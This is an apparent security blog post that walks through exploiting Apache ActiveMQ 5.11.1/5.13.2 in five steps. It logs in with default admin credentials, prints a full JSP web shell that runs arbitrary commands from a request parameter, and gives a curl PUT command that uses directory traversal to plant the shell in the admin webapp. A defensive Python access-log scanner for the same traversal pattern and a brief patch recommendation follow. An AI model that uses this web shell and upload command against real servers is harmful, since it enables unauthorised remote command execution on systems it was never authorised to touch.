Exploiting ActiveMQ 5.11.1/5.13.2 under 5 minutes with 5 steps (Directory Traversal / RCE)
Today we are going to exploit an ActiveMQ instance running on port 8161 without Metasploit.
Apache ActiveMQ is an open source message broker written in Java, shipped together with a full Java Message Service (JMS) client. It provides "Enterprise Features", which in this case means brokering communication between more than one client or server.
Time to exploit:
We first of all visit the target host on the specific port (8161).
Navigate to the /admin path.
By entering the default credentials, we are able to log in to the portal. We then create a file on our attacker machine named inveteck.jsp:
$ cat inveteck.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="attack">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("attack") != null) {
out.println("Command: " + request.getParameter("attack") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("attack"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
Run a curl command to PUT (upload) the created inveteck.jsp to the server:
curl -u 'username:password' -v -X PUT --data "@inveteck.jsp" http://TARGET:8161/fileserver/..\\admin\\inveteck.jsp
Capture the request in Burp Suite, send it over to Repeater and try running ipconfig to check the IP address of our target.
Recommendation: The ActiveMQ project has released an advisory and patches.
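From the defender's side, the upload step above leaves a distinctive trace: a PUT to the fileserver webapp whose path climbs out of that directory with "..\" or "../" (plain or percent-encoded), followed by the dropped JSP being served from /admin. The following is an added example, not code from the original post, that scans access-log lines for that pattern; the log lines, hosts, timestamps and file names in it are constructed for illustration.

```python
# Added example: flag ActiveMQ fileserver PUT traversal and JSP uploads in access logs.
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format, hypothetical hosts/paths).
SAMPLE_LOG = r"""10.0.0.5 - - [12/Mar/2016:10:01:02 +0000] "GET /admin/ HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2016:10:02:11 +0000] "PUT /fileserver/..\admin\inveteck.jsp HTTP/1.1" 204 0
10.0.0.9 - - [12/Mar/2016:10:02:30 +0000] "PUT /fileserver/..%5cadmin%5cshell.jsp HTTP/1.1" 204 0
10.0.0.9 - - [12/Mar/2016:10:03:05 +0000] "GET /admin/inveteck.jsp?attack=ipconfig HTTP/1.1" 200 812
10.0.0.7 - - [12/Mar/2016:10:04:00 +0000] "PUT /fileserver/notes.txt HTTP/1.1" 204 0
10.0.0.7 - - [12/Mar/2016:10:05:00 +0000] "PUT /fileserver/report.jsp HTTP/1.1" 204 0"""

LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def is_traversal(path):
    """True if the decoded path escapes its directory with ../ or ..\\ (any encoding)."""
    decoded = unquote(unquote(path))  # collapse single and double percent-encoding
    return bool(re.search(r'\.\.[\\/]', decoded))

def classify(line):
    """Return a finding label for one access-log line, or None if nothing stands out."""
    m = LINE_RE.search(line)
    if not m:
        return None
    method, target = m.group("method"), m.group("target")
    path = target.split("?", 1)[0]
    lowered = unquote(path).lower()
    if method == "PUT" and lowered.startswith("/fileserver/") and is_traversal(path):
        return "fileserver-put-traversal"   # the exact primitive used in the post
    if method == "PUT" and lowered.endswith(".jsp"):
        return "jsp-upload"                 # executable content written via PUT
    return None

def scan(log_text):
    """Map each suspicious line number (1-based) to its finding label."""
    findings = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        label = classify(line)
        if label:
            findings[n] = label
    return findings

if __name__ == "__main__":
    for n, label in scan(SAMPLE_LOG).items():
        print(f"line {n}: {label}")
```

A hit on "fileserver-put-traversal" is worth treating as a compromise indicator rather than a policy violation, since the write lands inside a webapp that will compile and run the file on the next GET.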
www.inveteckglobal.com
credit: DAVID JORM